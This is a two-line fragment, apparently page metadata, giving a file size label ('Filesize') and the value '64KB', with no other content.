Filesize
64KB